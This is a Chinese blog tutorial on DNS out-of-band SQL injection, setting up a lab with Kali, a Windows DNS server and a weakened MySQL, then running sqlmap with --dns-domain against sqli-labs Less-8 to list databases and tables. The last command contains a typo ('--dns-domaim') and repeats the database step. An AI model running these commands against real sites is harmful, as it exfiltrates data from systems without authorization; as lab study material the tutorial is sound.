当前位置:网站首页>DNS外带注入SQLMAP
DNS外带注入SQLMAP
2022-08-11 05:21:00 【朵拉爱学习】
一.实验环境
1.kali(使用sqlmap)
2.windows10(靶机)
3.windows 2008 R2 ( 需要设置dns服务器)下载镜像地址: https://msdn.itellyou.cn/
设置mysql
secure_file_priv为空,就可以读取磁盘的目录
secure_file_priv为D:\,就可以读取D盘的文件
secure_file_priv为null,load_file就不能加载文件
添加一句secure_file_priv=""
设置dns服务器
上面服务器这里填kali的ip,下面是主机首选dns服务器填服务器的ip
kali输入tcpdump -n port 53
ping通有数据包就说明成功(如果ping不通服务器的ip的话就关掉防火墙)
也填kali的ip
二.SQLMap使用外带dns注入
取库
输入sqlmap -u "http://192.168.10.195/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domain "hxp1.top" --dbs
获取表
kali输入sqlmap -u "http://192.168.10.195/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domain "hxp1.top" -D security --tables
获取到列
输入sqlmap -u "http://192.168.10.195/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domaim "hxp1.top" --dbs
边栏推荐
- mysql基本概念之存储引擎
- 利用Redis的bitMap完成用户签到功能
- LVS负载群集--DR模式
- 05-Nodejs中的模块加载机制
- LeetCode1166. Designing File Systems
- NodeRed系列—nodered安装及基本操作
- Some writing skills commonly used in Markdown
- C language file operation - detailed explanation of data file type, file judgment, and file buffer
- npm install 时报 npm ERR Cannot read properties of null (reading ‘pickAlgorithm‘)
- Markdown编辑器
猜你喜欢
mysq基础语句+高级操作(学这篇就够了)
C - file operations fseek () function, ftell, rewind, rounding
npm install 时报 npm ERR Cannot read properties of null (reading ‘pickAlgorithm‘)
NodeRed系列—nodered安装及基本操作
05-JS中的BOM和DOM
C语言自定义数据类型——联合体
09-ES6语法:变量、箭头函数、类语法、静态属性及非静态属性
解读String的intern()
Windows64位MySQL配置式安装(绿色版)
《现代密码学》学习笔记——第五章 密钥分配与密钥管理
随机推荐
mysq基础语句+高级操作(学这篇就够了)
常用的转义字符
emqx创建规则引擎写入tDengine
利用正则回溯最大次数上限绕过preg_match
C语言结构体——位段概念的讲解
06-引入Express创建web服务器、接口封装并使用postman测试,静态资源托管
Nodered系列—使用node-red-node-mysql写入mysql详细步骤
《现代密码学》学习笔记——第七章 密钥管理[一]
IDEA本机连接远程TDengine不成功,终于配置成功
Windows64位MySQL配置式安装(绿色版)
云计算学习笔记——第三章 计算虚拟化[一]
函数:万能的百宝箱
ES6-class类
Chapter 4-2 a complex type (pointer)
Dos命令
《现代密码学》学习笔记——第三章 分组密码 [三]分组密码的运行模式
C语言——逆序输出字符串的函数实现
06-JS定时器:间隔定时器、延时定时器
代币标准--ERC1155协议源码解析
C语言动态内存分配(1)三种函数讲解